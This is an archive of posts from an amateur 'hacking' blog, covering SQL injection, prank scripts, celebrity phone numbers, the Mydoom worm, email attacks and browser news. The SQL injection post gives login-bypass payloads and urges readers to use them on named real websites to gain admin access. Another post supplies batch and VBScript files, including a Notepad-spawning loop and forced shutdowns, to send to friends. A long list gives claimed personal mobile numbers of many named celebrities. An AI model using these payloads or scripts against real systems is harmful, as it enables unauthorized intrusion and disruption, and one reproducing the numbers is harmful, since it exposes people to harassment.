Zapak Hacking

SQL Injection overview

2009-01-10T08:58:00.000-08:00

What is SQL Injection?
SQL injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. Web pages which accepts parameters from user, and make SQL query to the database, are targeted. For Example, A web page with username and password, fires SQL query on the database to check whether a user has entered valid name and/or password or not. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.

What is Required?
1) Any Web Browser
2) Some Basic SQL (Structured Query Language) Queries such as 'SELECT', 'INSERT', 'UPDATE', 'DELETE', etc. along with their attributes (i.e Syntax).

What you should look for?
Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP/ASPX page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:

Everything between the tags have potential parameters that might be useful.

You should look for pages like ASP, ASPX, JSP, CGI, or PHP.
Try to look especially for URL that takes parameters, like:
http://example.com/login.asp?id=10

Is it Vulnerable?
Start with a single quote trick. Input something like:
hi' or 1=1--
Into login, or password, or even in the URL. Example:
Login: hi' or 1=1--
Pass: hi' or 1=1--
http://example.com/login.asp?id=hi' or 1=1--

You can do this with a hidden field, just view the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly.
Example:

If luck is on your side, you will get login without any login name or password.

But why ' or 1=1-- ?
Take an asp page that will link you to another page with the following URL:
http://example.com/search.asp?category=sports
In this URL 'category' is the variable name and 'sports' is it's value.
Here this request fires following query on the database in background.
SELECT * FROM search WHERE category='sports'
Where 'search' is the name of table which is already present in some database.
So, this query returns all the possible entries from table 'search' which comes under the category 'sports'.

Now, assume that we change the URL into something like this:
http://example.com/search.asp?category=sports' or 1=1--
Now, our variable 'category' equals to "sports' or 1=1-- ", which fires SQL query on database something like:
SELECT * FROM search WHERE category='sports' or 1=1--'
The query should now select everything from the 'search' table regardless if category is equal to 'sports' or not.
A double dash "--" tell MS SQL server to ignore the rest of the query, which will get rid of the last hanging single quote (').
Sometimes, it may be possible to replace double dash with single hash "#".

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try
' or 'a'='a
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
'or''='

Countermeasures ?
Filter out character like ' " - / \ ; NULL, etc. in all strings from:
* Input from users
* Parameters from URL
* Values from cookie

Some Sites On which SQL works

Now lets try this sql injection on some sites ..

First site i found is RIL ( reliance industry limited )... a very big site but still its prone to SQL injection even a lay man can hack this site for admin privilege..u dont belive me ..ok check it out .. click here ... open this page ( note : u shd have firefox to hack this site on IE this trick does't work ) ... ok open this page and in user name column type ' or 1=1-- and copy this and paste this in password section too and press enter ... tada u have hacked the site ...

next site i'm gonna discuss in sirfdosti.com its a site like orkut ( social networking site) this site can be hacked through SQL injection . After opening the site type h' or '1'='1 and copy this and paste in password section too ..tada ..u have hacked another site ..its simple is't it ?but it is result of poor SQL programming ...i know many more sites like this ...some are karorimalcollege.com ( its one of the college in delhi) , aamirkhan.com ( its a official site of amir khan ) ...

Funny Notepad pranks

2009-01-06T01:32:00.000-08:00

1) Convey your friend a lil' message and shut down his / her computer:
Type :

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

2) Toggle your friend's Caps Lock button simultaneously:
Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

3) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

4) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

6) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

8. Open Notepad continually in your friend's computer:
Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

Related Post .

Make Viruses in notepad .

Check Your Internet Speed - Code for Blogger

2008-12-24T15:00:00.000-08:00

I'm sure you have seen them, different sites that measure your internet connection speed. I like, them because they can be good for troubleshooting, and also so you can get an idea on just what your internet connection can handle.

What you may not have seen is friendly code to embed a speed test on your Blogspot blog! Sure, the one below can be downloaded and hosted on your web server if you manage your own web server, but what if your blog, like mine is hosted on Blogger? Then you are SOL!

Not anymore! Now with the help of the mighty iframe, you too can have your own internet speed test courtesy of Bauer-Power and Speedtest.net! Check it out!

Here is your embed code:

BOLLYWOOD STARS PERSONEL MOBILE NUMBERS

2008-12-24T08:08:00.000-08:00

Hey friends , i found personal mobile numbers of many famous actors and actress ..

Mahesh bhatt 0-9870166444

Amrita thapar 9819020281

Palash sen 9811133137

Diya mirza 0-9849044786

Raj babar 0-9820185066

Manish malhotra 0-9821222355

Kareena kapoor 0-9820067426

Ashutosh rana 0-9820067426

Nana patekar 0-9820295451

Arbaaz khan 0-9821373555

Malaika arora 0-9821036544

Jakie shroff 0-9821016722

Samar khan 0-9820082155

Ritesh deshmukh 0-9821512345

Smriti irani 0-9820075198 / 9820019728

Sanjay khan 0-9821061038

Ashok pandit 0-9821054279

Sachin (anchor and actor) 0-9820062674

Jaspal bhatti 0-9814088308

Jasbir jassi 9810088049

Raju srivastava 0-9820033096

Jagjit singh

Shefali zariwala 0-9820452718

Hary (p.a to shefali) 0-9820021332

Amaan ali 9810065511

Ayaan ali 9810311667

R.madhvan 0-9821132406

Rafiq (P.A to madhvan) 0-9870463062

Mini mathur 0-9820183725

Govinda 0-9820190290

Sudhesh bhonsle 0-9820022953

Taran adarsh 0-9820030637

Kirti kumar 0-9324239527

Aditya pancholi 0-9820062884

Mithun 9843530337

Rahul bose 9821071545

Ram gopal verma 9820152189

Ramesh sippy 9820023144

Shahrukh khan 9821455540

Shyam benegal 9820290888

Subhash ghai 9821715544

Amol palekar 9822097977

Javed akhtar 022-26200066

Yash chopra 9820020281

Rongita 9821235711

(Pritish nandy’s daughter)

Rikku rakeshnath 9820041153

(madhuri’s P.A)

Daler mahendi 9871055555

Manoj vajpayee 9820310954

Kumar sanu 9821128768

Uday chopra 9820061083

Amol palekar 9822097977

Shubha mudgal 9810131284

Anupam kher 9820128130

Lushan dubey 9810370722

Leena singh 9811134030

Aruna bal 9810964234

Bobby grover 9810120342

Nafisa ali 9818449999

Vinay goel 9899078710

Rabbi shergill 9324676502

Mallaika sherawat 0-9821041074

Mohan Agashe 9822091355

Amir khan 9821432220

Asha bhonsle 9820037663

Karishma kapoor 9820029296

Lillet dubey 9821094283

Mahesh bhatt 9892228171

Randhir kapoor 9821046064

Ravina tandon 9820026179

Shyam benegal 9820290888

Shubha mudgal 9811026554

Sunny deol 9821345799

Manisha koirala 9821118830

Poonam dhillon 9820081380

Dilip Kumar 2226421004

Javed Akhtar 9821026202, 9820184645

Manoj Kumar 2239509000

Amitabh bachan 9820288000

Anu Malik 9870200010

Sanjay dutt 9821573277

Vashu bhagvani 9821125288

Devanand 9821012016

Sanjay khan 9821O61038

Nandita das 9821043944

Subhash ghai 9820092383

Himanshu malik 9820254200

Lata mangeshkar 022-24911514

Dipti navel 022-26341455

Shashi lal nair 9820134333

Pallavi joshi 9821045964

Pooja batra 9821030030

Rahul khanna 9820024343

Rahul dev 9820076286

Rajpal yadav 9820126168

Ruby bhatia 98210-59404

Saif ali khan O22-26366319 \ 9946

Salman khan 9821014288

Sanjay suri 9820033718

Satish kaushik 9820401587

Sonali kulkarni 9821128240

Suniel shetty 9821014557

Sushmita sen 9820059595

Shweta menon 9821114032

Tabbu 9821022136

Nirmal pandey 98200O4744

Rakhi sawant 9820391580

Karan johar 9821029531

Sanjay leela bhansali 9820556133

Konkana sen 9830050758

Ajay devgan 9820710615

Gulshan grover 9821043355

Rakhi sawant 9820130434

Prakash jaju ( Ex sec of priyanka chopra) 9821115095

SONU NIGAM 9821600011

SONU KAKKAR 9820989721

MIKA 09910044989, 09850102516

2008-12-24T05:28:00.000-08:00

Hey Friends , i find a great software for hacking any flash game , its simply amazing ..

Cheat Engine is an open source tool designed to give you the upper hand in games, but also contains other usefull tools to help debugging games and even normal applications.

It comes with a memory scanner to quickly scan for variables used within a game and allow you to change them, but it also comes with a debugger, disassembler, assembler, speedhack, trainer maker, direct 3D manipulation tools, system inspection tools and more.

Download

To downlaod cheat engine , click on the button below .

Tutorials

For tutorials on cheat engine , check out this link ..

Videos

here is a tutorial video that can help u out in using cheat engine .

IE8 Review

2008-12-24T03:38:00.000-08:00

I've recently installed IE8 beta 1 on my Laptop which is running XP Sp3 .

I'm a Firefox fan but still wants to experience other softwares (an internet browser), so i installed IE 8 on my laptop , yesterday i spent much time testing this new release of Microsoft Soft , and i think IE IS WORST BROWSER.........

This IE 8 BETA is an absolute nightmare for developers. I will urge MS not to release this version until they fix the issues. All our development has been done in ASP.NET 3.5, Ajax Toolkit, and also Ajax Pro. Most of the pages are not rendering properly especially TreeView Controls, IFRAMEs etc (we are using Telerik Controls for those two). Ajax Pro is not working at all. I can't even submit a comment on this site and I had to open FireFox to submit this comment. PLEASE DONT RELEASE THIS VERSION unless your QA Team has checked everything otherwise we have to tell all our huge user base not to use IE at all. Everything is working in IE 6.0, 7.0 and FireFox 3.0 and up. This is absolutely crazy. MS don't even let me browse a simple site sometime, it hangs for google.com .

Some of the problem i faced in IE 8 , i would like to share with u all ... if u find any trouble in IE8 then please dont be shy of commenting ..

When tried to access maps.google.com the browser displays a distorted image and content. Who needs to fix this Google or Microsoft ?

I'm using skype ver 3 , its addon is giving error in IE 8 " malfuctioning or malacious addon has caused IE8 to stop opening sites " .

MCAfee live scanner addon is Not working with it .

I'm having trouble while running windows update from Microsoft's site ( hahaha) ..

This type of error i'm getting updating my windows ..

It better not to install IE8 untill MS fixes all the flaws in it .

Related articles :-

http://www.microsoft.com/windows/Internet-explorer/beta/default.aspx

http://internetexplorer8.net/

IE Vs firefox

IE 8 Least popular browser

2008-12-23T14:00:00.000-08:00

Internet Explorer 8 -- Microsoft's latest release, currently at the Beta 2 stage -- was declared to be the safest but the least popular browser, according to a browser security survey.

On Wednesday, Utest, a social-networking and software testing company, announced the results of its Bug Battle browser contest. The event included participation from 1,330 security pros, hobbyists and tech enthusiasts, who found an alarming 672 bugs in the world's top three Web browsers.

Contest participants scavenged for bugs in IE8, Firefox 3.1 and the new Google Chrome browser, which just emerged from its beta stage.

A post-contest survey found that Internet Explorer was the only browser program not to receive a single "excellent" rating. Despite that result, IE8 was a relatively safer browser to use. Google Chrome clocked in with the most vulnerabilities (297 bugs). Open source counterpart Firefox had 207 bugs. Testers found just 169 bugs in IE8.

Apple's Safari and Opera were not rated. At the time of the contest, IE8, Chrome and Firefox 3.1 were all still in various beta releases.

Regardless of user preference, browsers generally represent a big attack vector and security concern.

"The browser is the most popular vehicle for getting exploits on client machines with the ultimate goal of controlling the machine for monetary purposes," said Wolfgang Kandek, chief technology officer for security firm Qualys. "Patching for browsers should be immediate and continuous and be removed from the OS level and included in the browser itself."

In other browser security news, Microsoft is continuing to investigate a remote code execution (RCE) vulnerability in IE7 that was publicized a day after the release of its December security patch. A security bulletin posted on Wednesday indicated that the company was "aware only of limited attacks."

On Thursday, Redmond described the RCE vulnerability as having originated from China. Microsoft's security bulletin suggested some possible workarounds for the problem.

The RCE vulnerability affects IE7 installed on the following operating systems: Windows XP Service Pack 2, Windows XP Service Pack 3, Windows Server 2003 Service Pack 1, Windows Server 2003 Service Pack 2, Windows Vista, Windows Vista Service Pack 1 and Windows Server 2008.

For more information about IE8 :-

http://www.microsoft.com/windows/Internet-explorer/beta/default.aspx

http://internetexplorer8.net/

IE Vs firefox

World's most dangerous Virus

2008-12-17T18:02:00.001-08:00

yesterday i was thiniking " What is the most dangerous computer virus EVER. what makes the BIGGEST damage of them all? "

and the answer i got is W32.Mydoom.A@mm

source : wikipedia, yahoo answers, mcafee, symante c .

26 January 2004: The Mydoom virus is first identified around 8am EST (1300 UTC), just before the beginning of the workday in North America. The earliest messages originate from Russia. For a period of a few hours mid-day, the worm's rapid spread slows overall internet performance by approximately ten percent and average web page load times by approximately fifty percent. Computer security companies report that Mydoom is responsible for approximately one in ten e-mail messages at this time.
Although Mydoom's denial of service attack was scheduled to begin on 1 February 2004, SCO Group's website goes offline briefly in the hours after the worm is first released. It is unclear whether Mydoom was responsible for this. SCO Group claimed it was the target of several distributed denial of service attacks in 2003 that were unrelated to computer viruses.

Here is some technical description of this virus :-

Discovered: January 26, 2004

Updated: February 13, 2007 12:16:57 PM

Also Known As: W32.Novarg.A@mm, W32/Mydoom@MM [McAfee], WORM_MIMAIL.R [Trend], Win32.Mydoom.A [Computer Assoc, W32/Mydoom-A [Sophos], I-Worm.Novarg [Kaspersky]

Type: Worm

Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP

When W32.Mydoom.A@mm is executed, it does the following:

Creates the following files:
- %System%\Shimgapi.dll: Shimgapi.dll acts as a proxy server, opening TCP listening ports in the range of 3127 to 3198. The backdoor also has the ability to download and execute arbitrary files.
- %Temp%\Message: This file contains random letters and is displayed using Notepad.
- %System%\Taskmon.exe.
  
  Notes:
- Taskmon.exe is a legitimate file in the Windows 95/98/Me operating systems, but is in the %Windir% folder, not the %System% folder. (By default, this is C:\Windows or C:\Winnt.) Do not delete the legitimate file in the %Windir% folder.
- %System% is a variable: The worm locates the System folder and copies itself to that location. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).
- %Temp% is a variable: The worm locates the temporary folder and copies itself to that location. By default, this is C:\Windows\TEMP (Windows 95/98/Me), or C:\WINNT\Temp (Windows NT/2000), or C:\Document and Settings\\Local Settings\Temp (Windows XP).
Adds the value:

"(Default)" = "%System%\shimgapi.dll"

to the registry key:

HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32

so that Explorer.exe loads Shimgapi.dll.
Adds the value:

"TaskMon" = "%System%\taskmon.exe"

to the registry keys:

HKEY_CURRENT_USER\Software\Microsft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

so that TaskMon is run when you start Windows.
Checks the system date, and if the date is between February 1, 2004 and February 12, 2004, there is a 25% chance the worm will perform a DoS attack against www.sco.com. The DoS is performed by creating 63 new threads that send GET requests and use a direct connection to port 80. The worm will not mass mail itself if the DoS attack is triggered.

Notes:
- The DoS attack will start at 16:09:18 UTC (08:09:18 PST) on February 1, 2004. The worm checks the local system time and date to determine if it should initiate the DoS attack.
- Due to the way the worm verifies the system date, the DoS will only be executed on 25% of infected computers.
- The DoS will only occur when the system date is checked during the initial infection, or if the computer is restarted.
- The worm will use local DNS settings to resolve the domain name used in the DoS attack (www.sco.com).
Creates the following registry keys:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ Explorer\ComDlg32\Version HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Explorer\ComDlg32\Version
Searches for the email addresses in the files with the following extensions:
- .htm
- .sht
- .php
- .asp
- .dbx
- .tbb
- .adb
- .pl
- .wab
- .txt
Attempts to send email messages using its own SMTP engine. The worm looks up the mail server that the recipient uses before sending the email. If it is unsuccessful, it will use the local mail server instead. The email will have the following characteristics:

From: The "From" address may be spoofed.

Subject: The subject will be one of the following:
test hi hello Mail Delivery System Mail Transaction Failed Server Report Status ErrorMessage: The message will be one of the following:
Mail transaction failed. Partial message is available. The message contains Unicode characters and has been sent as a binary attachment. The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment. testAttachment: The attachment file name, not including the extension, will be one of the following:
document
readme
doc
text
file
data
test
message
body

The attached file may have either one or two file extensions. If it does have two, the first extension will be one of the following:
.htm
.txt
.doc

The second extension, or the only extension if there is only one, will be one of the following:
.pif
.scr
.exe
.cmd
.bat
.zip (This is an actual .zip file that contains a copy of the worm, sharing the same file name as the .zip. For example, readme.zip can contain readme.exe.)

If the worm has an extension of .exe or .scr, the file will be displayed with the following icon:

For all the other file extensions, it will use the icon for that file type.
Copies itself to the Kazaa download folder as one of the following files:
- winamp5
- icq2004-final
- activation_crack
- strip-girl-2.0bdcom_patches
- rootkitXP
- office_crack
- nuke2004
  
  with a file extension of:
- .pif
- .scr
- .bat
- .exe

If u people know any other dangerous viruses then plz share with us in comments ..

Must Read : Create simple virus using note pad

Intrenet explorer 7 got critical security flaw

2008-12-17T17:50:00.001-08:00

Again? Yes. Microsoft's internet Explorer has got a new security Flaw (reported I6th of December 08).
This would allow hackers to take control of your computer and steal passwords. Now what can you do about it?

And here's what Microsoft's Official response -
“Microsoft is continuing its investigation of public reports of attacks against a new vulnerability in Internet Explorer.”

But here's some good news for IE6 Users. The flaw is only there in IE7 not in other versions but there may be, we are not sure.

Take my tip - If you use internet explorer than switch to Firefox or Chrome (these are safe) and then you will thank me for saving your precious data.

Related articles :

Why use Firefox ?

How big is google server

2008-12-16T20:47:00.000-08:00

Google is known to the world as a search engine, but in many ways it is foremost an effort to build a network of supercomputers, using the latest academic research, that can process more data — faster and cheaper — than its rivals.

"Google wants to raise the barriers to entry by competitors by making the baseline service very expensive," said Brian Reid, a former Google executive who is now director of engineering at the Internet Systems Consortium in Redwood City, Calif.

The rate at which the Google computing system has grown is as remarkable as its size. In March 2001, when the company was serving about 70 million Web pages daily, it had 8,000 computers, according to a Microsoft researcher granted anonymity to talk about a detailed tour he was given at one of Google's Silicon Valley computing centers. By 2003 the number had grown to 100,000.

One IT analyst reported
"The numbers don't add up. I could go on, but you will get the point. But what it all comes down to is this: Google has far more computing power at its disposal than it is letting on. In fact, there have been rumours in the business for months that the Google cluster actually has 450,000 servers".

Today even the closest Google watchers have lost precise count of how big the system is. The best guess is that Google now has more than 450,000 servers spread over at least 25 locations around the world. The company has major operations in Ireland, and a big computing center has recently been completed in Atlanta. Connecting these centers is a high-capacity fiber optic network that the company has assembled over the last few years.

It has been estimated that server of google has 640 gb of hard disk , now google has 450,000 (guessed) server . so whole google network has 640 X 450,000 = 288000000 Gb

My laptop is 120 gb , that means it would take 2400000 laptops to build google . hahaha..

Google has found that for search engines, every millisecond longer it takes to give users their results leads to lower satisfaction. So the speed of light ends up being a constraint, and the company wants to put significant processing power close to all of its users.

Microsoft's Internet computing effort is currently based on 200,000 servers, and the company expects that number to grow to 800,000 by 2011 under its most aggressive forecast, according to a company document.

Computer scientists and computer networking experts caution that it is impossible to compare the two companies' efforts directly. Yet it is the way in which Google has built its globally distributed network that illustrates the daunting task of its competitors in catching up.

"Google is like the Borg," said Milo Medin, a computer networking expert who was a founder of the 1990's online service @Home, referring to the robotic species on "Star Trek" that was forcibly assembled from millions of species and computer components. "I know of no other carrier or enterprise that distributes applications on top of their computing resource as effectively as Google."

Google's inclination to secrecy began in its days as a private company in an effort to keep its rivals from determining the profits it was making from Web search advertising. But its culture of secrecy has grown to pervade virtually all of its dealings with the news media and even its business partners.

In the end, of course, corporate secrets have a short shelf life in a search engine age. Entering "Dalles Google" as a Google query turns up plenty of revealing results. But Google Earth, the satellite mapping service, like its rivals, so far shows the 30-acre parcel here quite undeveloped.

Here's a list of the Google Servers used by different services as they're returned in the HTTP headers. Not all of them have transparent names and some of them may suggest interesting data (like the ctcserver for the not-yet-existent Google Call service linked from Google's robots.txt). Google Web Server is a modified versions of apache custom server that runs on Linux.

Server Name	Services
GWS (Google Web Server)	Web Search, Image Search and many other services
GFE/1.3 (Google Front-End)	Gmail, Calendar, Picasa Web Albums, Docs, Blogger, orkut, Reader and many other services
GWS-GRFE/0.50	Groups
bsfe (Blog Search Front-End)	Blog Search
OFE/0.1 (Ocean Front-End)	Book Search, Patent Search, Catalogs (Ocean is Google Book Search's code-name)
SMS search frontend 1.0	Google SMS
Search-History HTTP Server	Web History
Auto-Completion Server	Google Suggest, Firefox/Google Toolbar auto-complete
TrustRank Frontend	Safe Browsing
GCS/1.0	Safe Browsing
SFE/0.8	Finance
FTS (C)1997-2007 Interactive Data Managed Solutions AG	Finance charts
asfe	Base
mediaserver	Base (images)
cffe	Product Search (Froogle)
btfe	Thumbnails: Image Search, Google Video, Youtube
Video Stats Server	Google Video
cachefe:image (Cache Front-End)	Picasa Web photos
staticfe	interface images (Picasa Web)
ctcserver	Google Call ( www.google.com/call )
GoogleChartServer/1.0	used for dynamically-generated charts (e.g.: Google Video's stats)
NFE/1.0 (News Front-End)	News
mfe (Maps Front-End)	Maps
Keyhole Server 2.4	Maps, Earth (imagery)
PSFE/4.0	Alerts
igfe (iGoogle Front-End)	iGoogle
COMINST/1.0	Testing software installation (Pack, Picasa)
TWS/0.9 (Translation Web Server)	Translate
mws (Music Web Server)	Music Search
R2FE/1.0 (Reviews Front-End)	Reviews (Music, Movies)
zfe	Reviews
pfe	Co-op
codesite/5477219	Code
ga-reporting-fe	Analytics reporting
ucfe	Analytics
lpfe	Analytics (www.google-analytics.com/siteopt.js)
Toolbar Gaia User Service Server	Google Toolbar authentication
cafe (Ad Conversion Front-End)	Conversions
AdClickServer	Google test ad server
Google Trends	Google Trends
TFE/0.0 (Transliteration Front-End)	Google Indic Transliteration
Apache	most Labs services

Google search hacks

Google ranking explaination

How does google work

2008-12-16T20:33:00.000-08:00

How Does Google Work

Google was originally known as BackRub when it started in 1998. It represented a new approach to ranking sites on the web. Prior to Google, the dominant searches didn’t make much of an effort to improve their ranking systems. This led to a variety of bizarre results when people searched for something and the results were not particularly relevant. Google sought to overcome this problem.

Google works by focusing on relevancy. You will hear a variety of comments about how Google ranks sites, but in the end it all comes down to this term of art. Relevancy can simply be defined as a web page that is most relevant to the terms search for by a user. The trick, of course, is for Google to figure out how to determine relevancy.

Google works by focusing on the content of web pages. It tends to mostly ignore meta tags as too many search engine optimization people learned how to tweak their sites to get results. Since these tweaks were often shortcuts, the search results were less than great. To circumvent this, Google now focuses on the overall text of the page as well as the site as a whole. The exact Google formula, known as the algorithm, is not public information, but issues such as keyword density, flow of the text, amount of code, registration length of domain and how long visitors stay on a site all seem to be used. In truth, there are probably a couple hundred factors involved in the evaluation.

Google also determines relevancy and rankings by looking outside of a site. Specifically, it looks to see what other sites are linking to the site in question. In theory, the more sites linking to you must be an indication that you are offering highly relevant content on your site. For instance, the website for the IRS is consistently ranked highly for tax terms because thousands of sites link to it. Logically and practically, this must mean the IRS offers highly relevant information on taxes and of course it does.

As you might imagine, this linking factor led to the growth of an entire industry dedicated to trading links. This process is known as reciprocal linking. In the last year, Google has devalued such links because it no longer represents a measurement of relevancy. Instead, it just represents a measure of how many links a site can trade. Google now looks more at the type of links being traded and gives high value to links which are inbound only. This means someone is linking to your site without you linking back to them.

Asking how does Google work is a complex question. Part of the answer is unknown, but the parts we do know allow for the manipulation of search rankings. This, of course, leads to lots of traffic on a site.

How big is google server

Google search hacks

Google ranking explaination

E-Mail Attacks , IM attacks , SMTP attacks

2008-12-16T03:52:00.000-08:00

E-mail bombs

E-mail bombs can crash a server and provide unauthorized administrator
access. They attack by creating DoS conditions against your e-mail software
and even your network and Internet connection by taking up so much bandwidth
and requiring so much storage space.

Attachments
An attacker can create an attachment-overloading attack by sending hundreds
or thousands of e-mails with very large attachments.

Attacks
Attachment attacks may have a couple of different goals:
The whole e-mail server may be targeted for a complete interruption of
service with these failures:
• Storage overload
Multiple large messages can quickly fill the total storage capacity
of an e-mail server. If the messages aren’t automatically deleted by
the server or manually deleted by individual user accounts, the
server will be unable to receive new messages.
This can create a serious DoS problem for your e-mail system,
either crashing it or requiring you take your system offline to clean
up the junk that has accumulated. A 100MB file attachment sent
ten times to 80 users can take 80GB of storage space. Yikes!

• Bandwidth blocking
An attacker can crash your e-mail service or bring it to a crawl by
filling the incoming Internet connection with junk. Even if your
system automatically identifies and discards obvious attachment
attacks, the bogus messages eat resources and delay processing of
valid messages.

An attack on a single e-mail address can have serious consequences if
the address is for a really important user or group.

Countermeasures

These countermeasures can help prevent attachment-overloading attacks:
Limit the size of either e-mails or e-mail attachments. Check for this
option in e-mail server configuration options (such as those provided in
Novell GroupWise and Microsoft Exchange), e-mail content filtering, and
e-mail clients.

This is the best protection against attachment overloading.
Limit each user’s space on the server. This denies large attachments
from being written to disk. Limit message sizes for inbound and even
outbound messages if you want to prevent a user from launching this
attack inside your network. 10MB to 20MB to be good limits.Consider using
FTP or HTTP instead of e-mail for large file transfers. By
doing so, you can store one copy of the file on a server and have the
recipient download it on his or her own. This can help keep message
store sizes at a minimum.

Connections
A hacker can send a huge amount of e-mails simultaneously to addresses on
your network. These connection attacks can cause the server to give up on servicing
any inbound or outbound TCP requests. This can lead to a complete
server lockup or a crash, often resulting in a condition where the attacker is
allowed administrator or root access to the system!

Countermeasures

Many e-mail servers allow you to limit the number of resources used for
inbound connections. It can be next to impossible tocompletely stop an unlimited amount of inbound requests. However, you canminimize the impact of the attack. This setting limits the amount of server processor time, which can help prevent a DoS attack.

Even in large companies, there’s no reason that thousands of thousands of
inbound e-mail deliveries should be necessary within a short time period.
Some e-mail servers, especially UNIX-based servers, can be programmed to
deliver e-mails to a daemon or service for automated functions. If DoS protection
isn’t built into the system, a hacker can crash both the server and the
application that receives these messages.

Autoresponders
An interesting attack seen is to find two or more users on the same or different
e-mail systems that have autoresponder configured. Autoresponder is
that annoying automatic e-mail response you often get back from random
users when you’re subscribing to a mailing list. A message goes to the mailinglist
subscribers, and then users have their e-mail configured to automatically
respond back, saying they’re out of the office or, worse, on vacation. This is a
great way to tell thousands of people that your house and belongings are possibly
available for taking.

Attacks
An autoresponder attack is a pretty easy hack. Many unsuspecting users and
e-mail administrators never know what hit them! The hacker sends each of the
two (or more) users an e-mail from the other simply by masquerading as that
person (an easy hack I outline in this chapter). This attack can create a neverending
loop that bounces thousands of messages back and forth between
users. This can create a DoS condition by filling either the user’s individual
disk space quota on the e-mail server or the e-mail server’s entire disk space.

Countermeasures

The best countermeasure for an autoresponder attack is to make it policy
that no one sets up an autoresponder message. Those messages are too
annoying to be of value anyway, right?
Prevent e-mail attacks as far out on your network perimeter as you can. The
more traffic or malicious behavior you keep off your e-mail servers and clients,
the better.
Automatic e-mail security
You can implement the following countermeasures as an additional layer of
security for your e-mail systems.

Tarpitting
Tarpitting detects inbound messages destined for unknown users. If your
e-mail server supports tarpitting, it can help prevent spam or DoS attacks
against your server. If a predefined threshold is exceeded — say, more than
ten messages — the tarpitting function effectively blocks traffic from the sending
IP address for a period of time.

E-mail firewalls
E-mail firewalls and content-filtering applications (such as CipherTrust’s
IronMail and NetIQ’s MailMarshal, respectively) can prevent various e-mail
attacks. These tools protect practically every aspect of an e-mail system.

Perimeter protection
Although not e-mail–specific, many firewall, IDS, and IDP systems can detect
various e-mail attacks and shut off the attacker in real time. This can come in
handy during an attack at an inconvenient time.

SMTP attacks

Some hacker attacks exploit weaknesses in the Simple Mail Transfer Protocol
(SMTP). This e-mail communications protocol — which is over 20 years old —
was designed for functionality, not security.

Account enumeration
A clever way that hackers can verify whether e-mail accounts exist on a server
is simply to telnet to the server on port 25 and run the VRFY command. The
VRFY — short for verify — command makes a server query to check whether
a specific user ID exists. Spammers often automate this method to perform a
directory harvest attack (DHA). It’s a way of gleaning valid e-mail addresses
from a server or domain so hackers know who to send spam messages.

Attacks

The SMTP command EXPN — short for expand — may allow attackers to verify
what mailing lists exist on a server as well. You can simply telnet to your e-mail
server on port 25 and try EXPN on your system if you know of any mailing lists
that may exist. Figure 15-6 shows what this result may look like. It’s simple to
script this attack and test thousands of mailing-list combinations.
You may get bogus information from your server when performing these two
tests. Some SMTP servers don’t support the VRFY and EXPN commands, and
some e-mail firewalls simply ignore them or return false information.

Countermeasures
The best solution for preventing this type of e-mail account enumeration
